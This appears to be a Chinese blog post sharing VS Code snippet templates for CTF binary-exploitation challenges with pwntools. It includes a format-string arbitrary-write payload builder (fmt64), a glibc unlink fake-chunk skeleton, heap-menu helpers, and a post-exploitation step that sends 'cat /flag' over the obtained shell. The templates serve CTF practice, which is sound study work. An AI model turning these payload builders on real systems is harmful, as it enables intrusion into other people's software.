模板说明

代码格式为code-snippets,可以直接复制代码命名为XXX.code-snippets,然后导入到VScode。导入方式这里只提供最简单的一种,依次使用”档案”->”喜好设定”->”使用者程式码片段”(此处与语言包有关,这里示例使用的语言包为”中文(繁体)”),然后点击”新增全域程式码片段档案”,记住弹出的对话框的保存目录(Ubuntu16.04默认路径为~/.config/Code/User/snippets),最后将XXX.code-snippets复制到该目录下,重启VScode即可。注意:body 数组里的每一行都是 JSON 字符串,其中的双引号必须写成 \" 、反斜杠必须写成 \\ ;另外 $ 在代码片段语法中表示制表位或变量,要按字面插入 $ 时需写成 \\$ ,否则会被当成占位符而丢失。

一般模板

代码格式:code-snippets,推荐命名:Pwn.code-snippets,触发词:pwn

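{
    // Place your global snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and 
    // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope 
    // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is 
    // used to trigger the snippet and the body will be expanded and inserted. Possible variables are: 
    // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. 
    // Placeholders with the same ids are connected.
    // Example:
    // "Print to console": {
    //  "scope": "javascript,typescript",
    //  "prefix": "log",
    //  "body": [
    //  "console.log('$1');",
    //  "$2"
    //  ],
    //  "description": "Log output to console"
    // }
    // NOTE: every body line is a JSON string. Double quotes must be written as \", a
    // backslash as \\ and a literal $ as \\$ (a bare $ starts a tab stop / variable).
    "Pwn template": {
    "scope": "python",
    "prefix": "pwn",
    "body": [
        "from pwn import *",
        "import sys",
        "context.log_level='debug'",
        "# context.arch='amd64'",
        "# context.arch='i386'",
        "",
        "file_name=ELF('')",
        "# context.binary = file_name  # derives arch/bits/os from the ELF instead of hard-coding context.arch",
        "",
        "# context.arch is a string ('amd64', 'i386', ...); the bare names amd64/i386 were undefined",
        "if context.arch == 'amd64':",
        "    libc=ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
        "elif context.arch == 'i386':",
        "    libc=ELF(\"/lib/i386-linux-gnu/libc.so.6\")",
        "else:",
        "    libc=None  # no default libc for this arch; pass one via get_sh(other_libc=...)",
        "",
        "def get_sh(other_libc=None):",
        "    \"\"\"Open a tube to the target.",
        "",
        "    Without REMOTE (pwntools `args`) a local process of \"./\" is started. With",
        "    REMOTE=1 the script connects to sys.argv[1]:sys.argv[2]; if other_libc is",
        "    given it replaces the module-level `libc` with that ELF so leak offsets are",
        "    taken from the remote build.",
        "    \"\"\"",
        "    global libc",
        "    if not args['REMOTE']:",
        "        return process(\"./\")",
        "    if other_libc is not None:",
        "        libc = ELF(other_libc)",
        "    if len(sys.argv) < 3:",
        "        # log.error raises, so this also aborts the script",
        "        log.error('usage: REMOTE=1 %s <host> <port>' % sys.argv[0])",
        "    return remote(sys.argv[1], int(sys.argv[2]))",
        "",
        "def get_address(sh, info='', start_string=None, end_string=None, int_mode=False):",
        "    \"\"\"Read one leaked value from the tube and return it as an int.",
        "",
        "    Skips up to start_string (if given), then takes the bytes before end_string.",
        "    int_mode parses them as hex text; otherwise they are raw little-endian bytes,",
        "    right-padded with NULs (leaks are usually cut at the first NUL) and unpacked",
        "    with u64 on amd64 or u32 otherwise. The value is logged with `info` as prefix.",
        "    \"\"\"",
        "    if start_string:",
        "        sh.recvuntil(start_string)",
        "    # drop=True removes exactly the delimiter; .strip(end_string) stripped any of its",
        "    # characters from both ends and could eat digits of the leak",
        "    raw = sh.recvuntil(end_string, drop=True)",
        "    if int_mode:",
        "        address = int(raw, 16)",
        "    elif context.arch == 'amd64':",
        "        address = u64(raw.ljust(8, b'\\x00'))  # bytes pad: works on py2 and py3 tubes",
        "    else:",
        "        address = u32(raw.ljust(4, b'\\x00'))",
        "    log.success(info + hex(address))",
        "    return address",
        "",
        "def get_flag(sh):",
        "    \"\"\"On an obtained shell: run `ls`, discard its output, then `cat /flag` and",
        "    return the first line of that output.",
        "    Caveat: sh.recv() only drains what has already arrived, so a slow `ls` can",
        "    leak into the returned line.",
        "    \"\"\"",
        "    listing_cmd, flag_cmd = 'ls', 'cat /flag'",
        "    # sh.recv()",
        "    sh.sendline(listing_cmd)",
        "    _ = sh.recv()  # discard the directory listing",
        "    sh.sendline(flag_cmd)",
        "    line = sh.recvline()",
        "    return line",
        "",
        "def get_gdb(sh, stop=False):",
        "    \"\"\"Attach gdb to the tube; with stop=True block on Enter so breakpoints can be",
        "    placed before the exploit continues.\"\"\"",
        "    gdb.attach(sh)",
        "    if not stop:",
        "        return",
        "    raw_input()  # Python 2; on Python 3 use input() or pwntools' pause()",
        "",
        "if __name__ == \"__main__\":",
        "    sh = get_sh()",
        "    get_gdb(sh)",
        "    payload = ''  # TODO: build the exploit payload here (was an undefined name)",
        "    sh.sendline(payload)",
        "    sh.interactive()",
        "    # sh.recvuntil('')",
        "    # only reachable if the session is still open after leaving interactive()",
        "    flag=get_flag(sh)",
        "    log.success('The flag is %s' % flag)  # %s works for both str (py2) and bytes (py3)"
    ],
    "description": "solve pwn problems!"
    }
}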

模板效果

from pwn import *
import sys
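context.log_level='debug'
# context.arch='amd64'
# context.arch='i386'

file_name=ELF('')
# context.binary = file_name  # derives arch/bits/os from the ELF instead of hard-coding context.arch

# context.arch is a string ('amd64', 'i386', ...); the bare names amd64/i386 were undefined
if context.arch == 'amd64':
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elif context.arch == 'i386':
    libc=ELF("/lib/i386-linux-gnu/libc.so.6")
else:
    libc=None  # no default libc for this arch; pass one via get_sh(other_libc=...)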

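def get_sh(other_libc=None):
    """Open a tube to the target.

    Without REMOTE (pwntools `args`) a local process of "./" is started. With
    REMOTE=1 the script connects to sys.argv[1]:sys.argv[2]; if other_libc is
    given it replaces the module-level `libc` with that ELF so leak offsets are
    taken from the remote build (the original ignored the argument and loaded
    ELF("./") instead). `null` is not a Python name; the default is None.
    """
    global libc
    if not args['REMOTE']:
        return process("./")
    if other_libc is not None:
        libc = ELF(other_libc)
    if len(sys.argv) < 3:
        # log.error raises, so this also aborts the script
        log.error('usage: REMOTE=1 %s <host> <port>' % sys.argv[0])
    return remote(sys.argv[1], int(sys.argv[2]))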

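def get_address(sh, info='', start_string=None, end_string=None, int_mode=False):
    """Read one leaked value from the tube and return it as an int.

    Skips up to start_string (if given), then takes the bytes before end_string.
    int_mode parses them as hex text; otherwise they are raw little-endian bytes,
    right-padded with NULs (leaks are usually cut at the first NUL) and unpacked
    with u64 on amd64 or u32 otherwise. The value is logged with `info` as prefix.
    """
    if start_string:
        sh.recvuntil(start_string)
    # drop=True removes exactly the delimiter; .strip(end_string) stripped any of its
    # characters from both ends and could eat digits of the leak
    raw = sh.recvuntil(end_string, drop=True)
    if int_mode:
        address = int(raw, 16)
    elif context.arch == 'amd64':
        address = u64(raw.ljust(8, b'\x00'))  # bytes pad: works on py2 and py3 tubes
    else:
        address = u32(raw.ljust(4, b'\x00'))
    log.success(info + hex(address))
    return address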

def get_flag(sh):
    """On an obtained shell: run `ls`, discard its output, then `cat /flag` and
    return the first line of that output.
    Caveat: sh.recv() only drains what has already arrived, so a slow `ls` can
    leak into the returned line.
    """
    listing_cmd, flag_cmd = 'ls', 'cat /flag'
    # sh.recv()
    sh.sendline(listing_cmd)
    _ = sh.recv()  # discard the directory listing
    sh.sendline(flag_cmd)
    line = sh.recvline()
    return line

def get_gdb(sh, stop=False):
    """Attach gdb to the tube; with stop=True block on Enter so breakpoints can be
    placed before the exploit continues."""
    gdb.attach(sh)
    if not stop:
        return
    raw_input()  # Python 2; on Python 3 use input() or pwntools' pause()

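if __name__ == "__main__":
    sh = get_sh()
    get_gdb(sh)
    payload = ''  # TODO: build the exploit payload here (was an undefined name)
    sh.sendline(payload)
    sh.interactive()
    # sh.recvuntil('')
    # only reachable if the session is still open after leaving interactive()
    flag=get_flag(sh)
    log.success('The flag is %s' % flag)  # %s works for both str (py2) and bytes (py3)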

格式化字符串模板

代码格式:code-snippets,推荐命名:Pwn_fmt.code-snippets,触发词:pwn_fmt

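{
    // Place your global snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and 
    // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope 
    // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is 
    // used to trigger the snippet and the body will be expanded and inserted. Possible variables are: 
    // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. 
    // Placeholders with the same ids are connected.
    // Example:
    // "Print to console": {
    //  "scope": "javascript,typescript",
    //  "prefix": "log",
    //  "body": [
    //  "console.log('$1');",
    //  "$2"
    //  ],
    //  "description": "Log output to console"
    // }
    // NOTE: every body line is a JSON string. Double quotes must be written as \", a
    // backslash as \\ and a literal $ as \\$ (a bare $ starts a tab stop / variable) -
    // the positional "%N$hn" below depends on that.
    "Pwn fmt template": {
    "scope": "python",
    "prefix": "pwn_fmt",
    "body": [
        "from pwn import *",
        "import sys",
        "context.log_level='debug'",
        "# context.arch='amd64'",
        "# context.arch='i386'",
        "",
        "file_name=ELF('')",
        "# context.binary = file_name  # derives arch/bits/os from the ELF instead of hard-coding context.arch",
        "",
        "# context.arch is a string ('amd64', 'i386', ...); the bare names amd64/i386 were undefined",
        "if context.arch == 'amd64':",
        "    libc=ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
        "elif context.arch == 'i386':",
        "    libc=ELF(\"/lib/i386-linux-gnu/libc.so.6\")",
        "else:",
        "    libc=None  # no default libc for this arch; pass one via get_sh(other_libc=...)",
        "",
        "def get_sh(other_libc=None):",
        "    \"\"\"Open a tube to the target.",
        "",
        "    Without REMOTE (pwntools `args`) a local process of \"./\" is started. With",
        "    REMOTE=1 the script connects to sys.argv[1]:sys.argv[2]; if other_libc is",
        "    given it replaces the module-level `libc` with that ELF so leak offsets are",
        "    taken from the remote build.",
        "    \"\"\"",
        "    global libc",
        "    if not args['REMOTE']:",
        "        return process(\"./\")",
        "    if other_libc is not None:",
        "        libc = ELF(other_libc)",
        "    if len(sys.argv) < 3:",
        "        # log.error raises, so this also aborts the script",
        "        log.error('usage: REMOTE=1 %s <host> <port>' % sys.argv[0])",
        "    return remote(sys.argv[1], int(sys.argv[2]))",
        "",
        "def get_address(sh, info='', start_string=None, end_string=None, int_mode=False):",
        "    \"\"\"Read one leaked value from the tube and return it as an int.",
        "",
        "    Skips up to start_string (if given), then takes the bytes before end_string.",
        "    int_mode parses them as hex text; otherwise they are raw little-endian bytes,",
        "    right-padded with NULs (leaks are usually cut at the first NUL) and unpacked",
        "    with u64 on amd64 or u32 otherwise. The value is logged with `info` as prefix.",
        "    \"\"\"",
        "    if start_string:",
        "        sh.recvuntil(start_string)",
        "    # drop=True removes exactly the delimiter; .strip(end_string) stripped any of its",
        "    # characters from both ends and could eat digits of the leak",
        "    raw = sh.recvuntil(end_string, drop=True)",
        "    if int_mode:",
        "        address = int(raw, 16)",
        "    elif context.arch == 'amd64':",
        "        address = u64(raw.ljust(8, b'\\x00'))  # bytes pad: works on py2 and py3 tubes",
        "    else:",
        "        address = u32(raw.ljust(4, b'\\x00'))",
        "    log.success(info + hex(address))",
        "    return address",
        "",
        "def get_flag(sh):",
        "    \"\"\"On an obtained shell: run `ls`, discard its output, then `cat /flag` and",
        "    return the first line of that output.",
        "    Caveat: sh.recv() only drains what has already arrived, so a slow `ls` can",
        "    leak into the returned line.",
        "    \"\"\"",
        "    listing_cmd, flag_cmd = 'ls', 'cat /flag'",
        "    # sh.recv()",
        "    sh.sendline(listing_cmd)",
        "    _ = sh.recv()  # discard the directory listing",
        "    sh.sendline(flag_cmd)",
        "    line = sh.recvline()",
        "    return line",
        "",
        "def get_gdb(sh, stop=False):",
        "    \"\"\"Attach gdb to the tube; with stop=True block on Enter so breakpoints can be",
        "    placed before the exploit continues.\"\"\"",
        "    gdb.attach(sh)",
        "    if not stop:",
        "        return",
        "    raw_input()  # Python 2; on Python 3 use input() or pwntools' pause()",
        "",
        "def fmt(prev, target):",
        "    \"\"\"Return the `%Nc` padding that advances printf's written-byte count from",
        "    prev to target, modulo 0x10000 (what a %hn write observes). Empty when no",
        "    padding is needed.",
        "    \"\"\"",
        "    if prev == target:",
        "        return \"\"",
        "    delta = target - prev",
        "    if delta < 0:",
        "        delta += 0x10000  # wrap around, since %hn only keeps the low 16 bits",
        "    return \"%%%dc\" % delta",
        "",
        "def fmt64(offset, target_addr, target_value, prev=0):",
        "    \"\"\"Build a payload that writes the low 48 bits of target_value to target_addr",
        "    with three 16-bit (%hn) writes.",
        "",
        "    offset: stack position of the start of our buffer (e.g. FmtStr(...).offset).",
        "    prev:   bytes printf has already output before the first %c (0 when the",
        "            format string is at the start of the output).",
        "    Layout: format specifiers padded to 0x40 bytes with 'a', then the three",
        "    addresses, so they sit at positions offset+8 .. offset+10. The top 16 bits",
        "    of target_value are never written.",
        "    \"\"\"",
        "    addrs = b\"\".join(p64(target_addr + 2 * i) for i in range(3))",
        "    specs = \"\"",
        "    for i in range(3):",
        "        chunk = (target_value >> (16 * i)) & 0xffff",
        "        # positional %N\\$hn; without the '\\$' each write would hit the next vararg instead",
        "        specs += fmt(prev, chunk) + \"%\" + str(offset + 8 + i) + \"\\$hn\"",
        "        prev = chunk",
        "    if len(specs) > 0x40:",
        "        raise ValueError('format specifiers exceed the 0x40-byte slot; the address positions would shift')",
        "    # encode so the str/bytes mix does not fail on py3 (no-op on py2)",
        "    return specs.ljust(0x40, \"a\").encode('latin-1') + addrs",
        "",
        "def exec_fmt(payload):",
        "    \"\"\"Probe callback for pwntools' FmtStr: run one fresh target, send payload and",
        "    return whatever it printed. Each probe gets its own process so probes do not",
        "    interfere; the tube is closed even when recv() raises (e.g. EOFError when",
        "    the probe crashes the target).",
        "    \"\"\"",
        "    sh = get_sh()",
        "    try:",
        "        sh.recvuntil(\"\")",
        "        sh.sendline(payload)",
        "        # sh.recvline()",
        "        return sh.recv()",
        "    finally:",
        "        sh.close()",
        "",
        "if __name__ == \"__main__\":",
        "    log.info('Now,test format string position...')",
        "    autofmt = FmtStr(exec_fmt)",
        "    format_string_position = autofmt.offset  # was used below but never assigned",
        "    print(format_string_position)",
        "",
        "    target_addr = 0   # TODO: address to overwrite (was the undefined name Address)",
        "    target_value = 0  # TODO: value to write there (was the undefined name Value)",
        "    sh=get_sh()",
        "    payload=fmt64(format_string_position, target_addr, target_value)",
        "    # payload=fmtstr_payload(format_string_position, {target_addr: target_value})",
        "    sh.recvuntil(\"\")",
        "    # gdb.attach(sh)",
        "    sh.sendline(payload)",
        "    sh.interactive()",
        "    print(sh.recv())  # only reachable if the session is still open after interactive()"
    ],
    "description": "Pwn to fmt!"
    }
}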

模板效果

from pwn import *
import sys
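context.log_level='debug'
# context.arch='amd64'
# context.arch='i386'

file_name=ELF('')
# context.binary = file_name  # derives arch/bits/os from the ELF instead of hard-coding context.arch

# context.arch is a string ('amd64', 'i386', ...); the bare names amd64/i386 were undefined
if context.arch == 'amd64':
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
elif context.arch == 'i386':
    libc=ELF("/lib/i386-linux-gnu/libc.so.6")
else:
    libc=None  # no default libc for this arch; pass one via get_sh(other_libc=...)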

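def get_sh(other_libc=None):
    """Open a tube to the target.

    Without REMOTE (pwntools `args`) a local process of "./" is started. With
    REMOTE=1 the script connects to sys.argv[1]:sys.argv[2]; if other_libc is
    given it replaces the module-level `libc` with that ELF so leak offsets are
    taken from the remote build (the original ignored the argument and loaded
    ELF("./") instead). `null` is not a Python name; the default is None.
    """
    global libc
    if not args['REMOTE']:
        return process("./")
    if other_libc is not None:
        libc = ELF(other_libc)
    if len(sys.argv) < 3:
        # log.error raises, so this also aborts the script
        log.error('usage: REMOTE=1 %s <host> <port>' % sys.argv[0])
    return remote(sys.argv[1], int(sys.argv[2]))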

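def get_address(sh, info='', start_string=None, end_string=None, int_mode=False):
    """Read one leaked value from the tube and return it as an int.

    Skips up to start_string (if given), then takes the bytes before end_string.
    int_mode parses them as hex text; otherwise they are raw little-endian bytes,
    right-padded with NULs (leaks are usually cut at the first NUL) and unpacked
    with u64 on amd64 or u32 otherwise. The value is logged with `info` as prefix.
    """
    if start_string:
        sh.recvuntil(start_string)
    # drop=True removes exactly the delimiter; .strip(end_string) stripped any of its
    # characters from both ends and could eat digits of the leak
    raw = sh.recvuntil(end_string, drop=True)
    if int_mode:
        address = int(raw, 16)
    elif context.arch == 'amd64':
        address = u64(raw.ljust(8, b'\x00'))  # bytes pad: works on py2 and py3 tubes
    else:
        address = u32(raw.ljust(4, b'\x00'))
    log.success(info + hex(address))
    return address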

def get_flag(sh):
    """On an obtained shell: run `ls`, discard its output, then `cat /flag` and
    return the first line of that output.
    Caveat: sh.recv() only drains what has already arrived, so a slow `ls` can
    leak into the returned line.
    """
    listing_cmd, flag_cmd = 'ls', 'cat /flag'
    # sh.recv()
    sh.sendline(listing_cmd)
    _ = sh.recv()  # discard the directory listing
    sh.sendline(flag_cmd)
    line = sh.recvline()
    return line

def get_gdb(sh, stop=False):
    """Attach gdb to the tube; with stop=True block on Enter so breakpoints can be
    placed before the exploit continues."""
    gdb.attach(sh)
    if not stop:
        return
    raw_input()  # Python 2; on Python 3 use input() or pwntools' pause()

def fmt(prev, target):
    """Return the `%Nc` padding that advances printf's written-byte count from
    prev to target, modulo 0x10000 (what a %hn write observes). Empty when no
    padding is needed.
    """
    if prev == target:
        return ""
    delta = target - prev
    if delta < 0:
        delta += 0x10000  # wrap around, since %hn only keeps the low 16 bits
    return "%%%dc" % delta

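def fmt64(offset, target_addr, target_value, prev=0):
    """Build a payload that writes the low 48 bits of target_value to target_addr
    with three 16-bit (%hn) writes.

    offset: stack position of the start of our buffer (e.g. FmtStr(...).offset).
    prev:   bytes printf has already output before the first %c (0 when the
            format string is at the start of the output).
    Layout: format specifiers padded to 0x40 bytes with 'a', then the three
    addresses, so they sit at positions offset+8 .. offset+10. The top 16 bits
    of target_value are never written.
    """
    addrs = b"".join(p64(target_addr + 2 * i) for i in range(3))
    specs = ""
    for i in range(3):
        chunk = (target_value >> (16 * i)) & 0xffff
        # positional %N$hn; the original emitted "%Nhn" (no '$'), which is a width,
        # so each write would have hit the next vararg instead of position N
        specs += fmt(prev, chunk) + "%" + str(offset + 8 + i) + "$hn"
        prev = chunk
    if len(specs) > 0x40:
        # ljust never truncates, so an overflow would silently shift the address slots
        raise ValueError('format specifiers exceed the 0x40-byte slot; the address positions would shift')
    # encode so the str/bytes mix does not fail on py3 (no-op on py2)
    return specs.ljust(0x40, "a").encode('latin-1') + addrs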

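def exec_fmt(payload):
    """Probe callback for pwntools' FmtStr: run one fresh target, send payload and
    return whatever it printed. Each probe gets its own process so probes do not
    interfere; the tube is closed even when recv() raises (e.g. EOFError when
    the probe crashes the target), which the original skipped.
    """
    sh = get_sh()
    try:
        sh.recvuntil("")
        sh.sendline(payload)
        # sh.recvline()
        return sh.recv()
    finally:
        sh.close()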

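if __name__ == "__main__":
    log.info('Now,test format string position...')
    autofmt = FmtStr(exec_fmt)
    format_string_position = autofmt.offset  # was used below but never assigned
    print(format_string_position)

    target_addr = 0   # TODO: address to overwrite (was the undefined name Address)
    target_value = 0  # TODO: value to write there (was the undefined name Value)
    sh=get_sh()
    payload=fmt64(format_string_position, target_addr, target_value)
    # payload=fmtstr_payload(format_string_position, {target_addr: target_value})
    sh.recvuntil("")
    # gdb.attach(sh)
    sh.sendline(payload)
    sh.interactive()
    print(sh.recv())  # only reachable if the session is still open after interactive()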

一般堆利用模板

代码格式:code-snippets,推荐命名:Pwn_heap.code-snippets,触发词:heap_func

{
    // Place your global snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and 
    // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope 
    // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is 
    // used to trigger the snippet and the body will be expanded and inserted. Possible variables are: 
    // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. 
    // Placeholders with the same ids are connected.
    // Example:
    // "Print to console": {
    //  "scope": "javascript,typescript",
    //  "prefix": "log",
    //  "body": [
    //      "console.log('$1');",
    //      "$2"
    //  ],
    //  "description": "Log output to console"
    // }
    "Print to console": {
        "scope": "python",
        "prefix": "heap_func",
        "body": [
            "def creat(sh,chunk_size,value):",
            "    sh.recvuntil('')",
            "    sh.sendline('')",
            "    sh.recvuntil('')",
            "    sh.sendline(str(chunk_size))",
            "    sh.recvuntil('')",
            "    sh.sendline(value)",
            "",
            "def delete(sh,index):",
            "    sh.recvuntil('')",
            "    sh.sendline('')",
            "    sh.recvuntil('')",
            "    sh.sendline(str(index))",
            "",
            "def show(sh,index):",
            "    sh.recvuntil('')",
            "    sh.sendline('')",
            "    sh.recvuntil('')",
            "    sh.sendline(str(index))",
            "",
            "def edit(sh,index,value):",
            "    sh.recvuntil('')",
            "    sh.sendline('')",
            "    sh.recvuntil('')",
            "    sh.sendline(str(index))",
            "    sh.recvuntil('')",
            "    sh.sendline(value)",
            "",
        ],
        "description": "Pwn to heap function"
    }   
}

模板效果——向利用脚本添加堆利用函数

def creat(sh,chunk_size,value):
    """Drive the target's "create chunk" menu entry: choose the option, answer the
    size prompt with chunk_size, then the content prompt with value.
    Every ''/'' pair is a placeholder: fill in the real prompt text and menu
    number for the binary at hand. (Name kept as `creat` for existing callers.)
    """
    dialogue = (
        ('', ''),                # menu prompt -> option number
        ('', str(chunk_size)),   # size prompt -> size
        ('', value),             # content prompt -> data
    )
    for prompt, answer in dialogue:
        sh.recvuntil(prompt)
        sh.sendline(answer)

def delete(sh,index):
    """Drive the target's "delete chunk" menu entry: choose the option, then
    answer the index prompt. Prompt text and option number are placeholders."""
    menu_prompt, index_prompt = '', ''
    option = ''
    sh.recvuntil(menu_prompt)
    sh.sendline(option)
    sh.recvuntil(index_prompt)
    sh.sendline(str(index))

def show(sh,index):
    """Drive the target's "show chunk" menu entry: choose the option, then send
    the chunk index. Prompt text and option number are placeholders; the
    caller reads the printed contents itself."""
    for prompt, answer in (('', ''), ('', str(index))):
        sh.recvuntil(prompt)
        sh.sendline(answer)

def edit(sh,index,value):
    """Drive the target's "edit chunk" menu entry: choose the option, send the
    chunk index, then the new contents. Prompt text and option number are
    placeholders to be filled in per binary."""
    answers = ['', str(index), value]
    for answer in answers:
        sh.recvuntil('')
        sh.sendline(answer)

Unlink利用模板

代码格式:code-snippets,推荐命名:Pwn_heap_unlink.code-snippets,触发词:pwn_heap_unlink(以下方 JSON 中的 "prefix" 为准)

{
    // Place your global snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and 
    // description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope 
    // is left empty or omitted, the snippet gets applied to all languages. The prefix is what is 
    // used to trigger the snippet and the body will be expanded and inserted. Possible variables are: 
    // $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders. 
    // Placeholders with the same ids are connected.
    // Example:
    // "Print to console": {
    //  "scope": "javascript,typescript",
    //  "prefix": "log",
    //  "body": [
    //      "console.log('$1');",
    //      "$2"
    //  ],
    //  "description": "Log output to console"
    // }
    "Print to console": {
        "scope": "python",
        "prefix": "pwn_heap_unlink",
        "body": [
            "target_addr=",
            "fd=target_addr - 0x18",
            "bk=target_addr - 0x10",
            "fake_chunk='a'*0x8 # prev_size",
            "fake_chunk+=p64() # size",
            "fake_chunk+=p64(fd)+p64(bk)",
            "fake_chunk+='a'* #padding",
            "",
        ],
        "description": "Pwn to heap unlink code"
    }   
}

模板效果——向利用脚本添加Unlink计算片段

# Unlink-attack skeleton for a 64-bit target (hence p64). target_addr is the
# address of the pointer P that the unlink should corrupt. fd/bk are chosen so
# that, in glibc's unlink sanity check `FD->bk == P && BK->fd == P`, fd->bk and
# bk->fd both land on that pointer (fd = P - 0x18, bk = P - 0x10); the unlink
# then ends up storing target_addr - 0x18 into *target_addr. These offsets
# assume the usual 64-bit malloc_chunk layout - confirm against the target's
# glibc version. The size field and the padding are left blank on purpose.
target_addr=
fd=target_addr - 0x18
bk=target_addr - 0x10
fake_chunk='a'*0x8 # prev_size
fake_chunk+=p64() # size
fake_chunk+=p64(fd)+p64(bk)
fake_chunk+='a'* #padding